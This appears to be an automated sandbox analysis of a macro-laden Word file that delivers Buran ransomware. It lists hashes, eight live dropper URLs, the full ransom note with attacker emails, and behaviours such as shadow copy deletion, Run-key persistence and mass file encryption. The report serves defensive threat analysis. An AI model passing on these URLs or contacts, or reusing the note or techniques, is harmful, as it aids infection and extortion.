buran | 0f81f4eb37083c821598ffd57cff12a082f19ca2de57c86faff65755ef332686

Analysis

max time kernel
103s
max time network
122s
platform
windows7_x64
resource
win7v20201028
submitted
04-11-2020 11:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Delivery-77426522.doc
Size

118KB
MD5

29584bef6e963b191cb0a900a75585db
SHA1

3c298a6f35cfdf61fc271a8cad59ea84b827335f
SHA256

0f81f4eb37083c821598ffd57cff12a082f19ca2de57c86faff65755ef332686
SHA512

c4084c658ade731ee3dae206b75ec47cb488c21b95963375a9ad8b016585b5f046c1e635fc65c57f271d99f6a0b0804998056e386c774775b5259a0f00ae8350

Score

10^/10

buran evasion persistence ransomware upx

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://vidrioindustrial.com/

exe.dropper

http://forcecareer.com/

exe.dropper

http://onw.kx1.in/

exe.dropper

http://hos365llc.com/

exe.dropper

http://testwebsite.taxauctioninvestors.com/

exe.dropper

http://shradhajewellers.com/

exe.dropper

https://educationmillion.com/

exe.dropper

http://geozone.at/

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: kassmaster@danwin1210.me and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: kassmaster@danwin1210.me Reserved email: kassmaster@tutanota.com Your personal ID: 7E7-686-D4D Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

kassmaster@danwin1210.me

kassmaster@tutanota.com

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 308 1508 cmd.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

6 700 powershell.exe
8 700 powershell.exe
Executes dropped EXE 5 IoCs

Processes:

Bw99ofg.exe15sp.exemesager43.execsrss.execsrss.exe

pid process

1300 Bw99ofg.exe
1896 15sp.exe
1980 mesager43.exe
1992 csrss.exe
2420 csrss.exe
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	308	1508	cmd.exe

flow	pid	process
6	700	powershell.exe
8	700	powershell.exe

pid	process
1300	Bw99ofg.exe
1896	15sp.exe
1980	mesager43.exe
1992	csrss.exe
2420	csrss.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\ssd\onset\mesager43.exe	upx
C:\ssd\onset\mesager43.exe	upx
\ssd\onset\mesager43.exe	upx
C:\ssd\onset\mesager43.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe	upx

Loads dropped DLL 5 IoCs

Processes:

cmd.execmd.exemesager43.exe

pid process

748 cmd.exe
1472 cmd.exe
1472 cmd.exe
1980 mesager43.exe
1980 mesager43.exe

pid	process
748	cmd.exe
1472	cmd.exe
1472	cmd.exe
1980	mesager43.exe
1980	mesager43.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mesager43.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run	mesager43.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\csrss.exe\" -start"	mesager43.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

csrss.exe

description	ioc	process
File opened (read-only)	\??\S:	csrss.exe
File opened (read-only)	\??\M:	csrss.exe
File opened (read-only)	\??\I:	csrss.exe
File opened (read-only)	\??\F:	csrss.exe
File opened (read-only)	\??\B:	csrss.exe
File opened (read-only)	\??\Y:	csrss.exe
File opened (read-only)	\??\V:	csrss.exe
File opened (read-only)	\??\U:	csrss.exe
File opened (read-only)	\??\Q:	csrss.exe
File opened (read-only)	\??\N:	csrss.exe
File opened (read-only)	\??\P:	csrss.exe
File opened (read-only)	\??\L:	csrss.exe
File opened (read-only)	\??\G:	csrss.exe
File opened (read-only)	\??\Z:	csrss.exe
File opened (read-only)	\??\X:	csrss.exe
File opened (read-only)	\??\T:	csrss.exe
File opened (read-only)	\??\K:	csrss.exe
File opened (read-only)	\??\J:	csrss.exe
File opened (read-only)	\??\H:	csrss.exe
File opened (read-only)	\??\E:	csrss.exe
File opened (read-only)	\??\A:	csrss.exe
File opened (read-only)	\??\W:	csrss.exe
File opened (read-only)	\??\R:	csrss.exe
File opened (read-only)	\??\O:	csrss.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 geoiptool.com

flow	ioc
10	geoiptool.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Drops file in Program Files directory 15042 IoCs

Processes:

csrss.exe

description	ioc	process
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00476_.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS01637_.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV.HXS	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar	csrss.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\CET.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.DPV.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01838_.GIF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0205462.WMF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_COL.HXT	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\TOC98.POC	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZUSR12.ACCDU	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107090.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241019.WMF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02361_.WMF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR48B.GIF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115866.GIF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png	csrss.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15035_.GIF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR9B.GIF	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15021_.GIF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00687_.WMF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01066_.WMF.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187819.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN090.XML	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01657_.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0205466.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Thatch.dotx	csrss.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FOLDPROJ.DPV	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB02229_.GIF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPrintTemplate.html.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita	csrss.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00270_.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake.7E7-686-D4D	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152690.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\XLICONS.EXE	csrss.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00299_.WMF	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML	csrss.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02417_.WMF	csrss.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

1592 timeout.exe
1776 timeout.exe
396 timeout.exe
2164 timeout.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

2460 vssadmin.exe
2652 vssadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2076 taskkill.exe
2120 taskkill.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
1592	timeout.exe
1776	timeout.exe
396	timeout.exe
2164	timeout.exe

pid	process
2460	vssadmin.exe
2652	vssadmin.exe

pid	process
2076	taskkill.exe
2120	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLib	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLib\{AF62E575-29A1-40E2-B0C9-B8087410C7B8}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AF62E575-29A1-40E2-B0C9-B8087410C7B8}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLib\{AF62E575-29A1-40E2-B0C9-B8087410C7B8}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AF62E575-29A1-40E2-B0C9-B8087410C7B8}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
